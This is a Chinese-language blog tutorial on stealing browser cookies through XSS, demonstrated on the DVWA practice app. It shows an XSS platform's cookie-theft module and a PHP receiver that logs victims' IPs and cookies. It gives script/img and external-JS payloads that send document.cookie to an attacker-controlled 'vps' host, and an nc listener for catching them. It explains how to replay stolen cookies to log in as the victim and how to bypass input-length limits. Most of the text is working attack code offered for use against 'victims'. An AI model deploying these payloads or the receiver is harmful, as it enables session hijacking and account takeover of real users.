接收Cookie总结

0x01 前言

最近总结了一下自己接收cookie的方法，和大家分享一下。来源于平时的积累和良师益友的分享。

0x02 进入正题

一：通过XSS平台接收cookie。
这个相信每个人都用过，是大家接收cookie最常用的一种方式。
1.去网上的XSS平台或者自己搭建的XSS平台新建一个项目。

2.在这里我们勾选默认模块，默认模块就是盗取cookie的，然后选择keepsession。

3.然后我们点击下一步，我们“cookie盗取”的项目就创建好了。

4.下面我们便可以将构造好的盗取cookie的payload发送给受害者，这里我们用DVWA做测试。我们可以直接使用XSS平台的payload，也可以自行构造payload。在这里我们直接使用XSS平台的payload。

5.查看我们接收到的cookie。

6.cookie利用。
方法一：利用火狐插件"tamper data"，将我们抓取的cookie添加进去。

点击OK，登录成功。

方法二：使用F12调试调试工具，找到我们的cookie，将cookie替换为我们抓取到的cookie。

再次访问“127.0.0.1/dvwa/”，即可登陆成功。

二：通过PHP页面接收cookie。
大家可以把接收cookie的PHP页面放到自己的vps上，这种方法用来接收用户cookie也是非常好用的。
1.在自己LAMP环境的vps上新建一个名为receive.php的页面，键入以下代码接收cookie。

<?php$cookie=$_GET['cookie'];$ip=getenv('REMOTE_ADDR');$time=date('Y-m-d g:i:s');$referer=getenv('HTTP_REFERER');$rec=fopen('cookie.txt','a');fwrite($rec,"IP:".$ip."| time:".$time."| referer:".$referer."| cookie:".$cookie."\n");fclose($rec);
?>

接下来我们就需要构造可以发送用户cookie到我们vps的payload。这里有以下2种方法。
方法一：直接利用script和img标签构造发送cookie的payload。
这种方法构造的payload较长。在DVWA有对输入字符长度的限制，这里我们可以通过审查元素绕过。

<script>document.write('<img src="http://vps/receive.php?cookie='+document.cookie+'" />')</script>

添加成功后，在我们vps中receive.php所在页面生成了一个名为cookie.txt的文件，盗取用户的cookie就被保存在这个文件中。

方法二：加载外部JS文件盗取cookie。
这样我们可以将更多的XSS代码放到外部的JS文件中，非常方便。这样也可以减小我们输入字符的长度。

<script src="http://vps/xss.js"></script>

xss.js文件内容：

new Image().src="http://vps/receive.php?cookie="+document.cookie;

接下来我们将payload插入到DVWA中。

插入成功后，同样在我们的cookie.txt中接收到了用户的cookie。

三：通过nc接收用户cookie。
1.构造插入到DVWA中的payload：

<script>document.write('<img src="http://vps/?'+document.cookie+'" />')</script>

2.在自己的vps中监听本地80端口（如果想从别的端口监听，需要在payload中vps地址后面加上指定的端口号）。

命令：nc -lvp 80

3.将我们的payload插入到DVWA中，成功监听到用户的cookie。

0x03 后记

本文所介绍的内容都比较基础，主要是想和大家分享一下，还有许多我不知道的接收cookie的方法，希望能和大家一起交流补充，谢谢。